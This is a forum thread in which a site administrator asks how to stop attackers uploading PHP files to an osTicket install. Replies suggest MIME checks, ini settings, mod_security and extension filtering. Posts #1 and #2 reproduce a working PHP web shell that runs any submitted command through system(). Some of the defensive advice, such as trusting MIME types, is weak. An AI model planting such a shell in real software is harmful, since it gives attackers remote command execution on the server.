SitePoint Sponsor

User Tag List

Results 1 to 8 of 8
  1. #1
    SitePoint Zealot bloo_fish's Avatar
    Join Date
    Aug 2003
    Location
    Bucks [Uk]
    Posts
    127
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    PHP uploads security problem

    Hey, I was osticket and somebody had uploaded a PHP file that gave them command line access

    they used a similar script to this i think

    PHP Code:
    <?PHP
    echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
    if (!
    $cmd)die;
    system($cmd);
    ?>
    after a quick browse on the net. What I want to know is how can i stop this happening again. I have disabled all uploads through osticket so that should stop it for now.

    Thanks for any help

  2. #2
    SitePoint Member
    Join Date
    Sep 2002
    Posts
    14
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You can just validate what type of file is being uploaded onto your system by checking the mime type and only allowing certain type like:

    images/jpegs


    Quote Originally Posted by bloo_fish
    Hey, I was osticket and somebody had uploaded a PHP file that gave them command line access

    they used a similar script to this i think

    PHP Code:
    <?PHP
    echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
    if (!
    $cmd)die;
    system($cmd);
    ?>
    after a quick browse on the net. What I want to know is how can i stop this happening again. I have disabled all uploads through osticket so that should stop it for now.

    Thanks for any help

  3. #3
    SitePoint Zealot bloo_fish's Avatar
    Join Date
    Aug 2003
    Location
    Bucks [Uk]
    Posts
    127
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by neoblast007
    You can just validate what type of file is being uploaded onto your system by checking the mime type and only allowing certain type like:

    images/jpegs

    But is there a way to disable php, perl etc from being able to do this, preferable through apache so it can stop all languages to doing it.

    Thanks for the response though

  4. #4
    ********* Wizard silver trophy Cam's Avatar
    Join Date
    Aug 2002
    Location
    Burpengary, Australia
    Posts
    4,495
    Mentioned
    0 Post(s)
    Tagged
    1 Thread(s)
    Stop PHP and Perl being able to do what? Check MIME types?

  5. #5
    SitePoint Zealot
    Join Date
    Apr 2004
    Location
    next to a pc connected to the poweroutlet
    Posts
    126
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You may wanna take a look at this http://au.php.net/ini-set

    Set it to 0m as you cannot turn file uploads without php.ini or httpd.conf access.

  6. #6
    SitePoint Zealot bloo_fish's Avatar
    Join Date
    Aug 2003
    Location
    Bucks [Uk]
    Posts
    127
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by psn
    You may wanna take a look at this http://au.php.net/ini-set

    Set it to 0m as you cannot turn file uploads without php.ini or httpd.conf access.
    Thankyou for the respons, but what exactly do i set to 0m?

    I have also found http://www.modsecurity.org/ which looks like it sets apache to only allow uploads of image file types

  7. #7
    SitePoint Guru toasti's Avatar
    Join Date
    Feb 2004
    Location
    Grahamstown
    Posts
    634
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    thanks for the modsecurity link. Some nice articles on security there too.

  8. #8
    SitePoint Zealot Scott.Mc's Avatar
    Join Date
    Jul 2004
    Location
    Scotland
    Posts
    158
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    alot of people use
    $var = explode(".", $var);
    $filetype = $var[1];

    this is what so many people use but think about it
    if i put test.jpg.php

    it will pass threw easily , so you should replace the .php , .cgi,.pl etc etc.
    Linux Server Management - AdminGeekZ.com
    Is your website Sluggish? Unavailable? Insecure?

    Why not call us? +44 0141 2800134


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •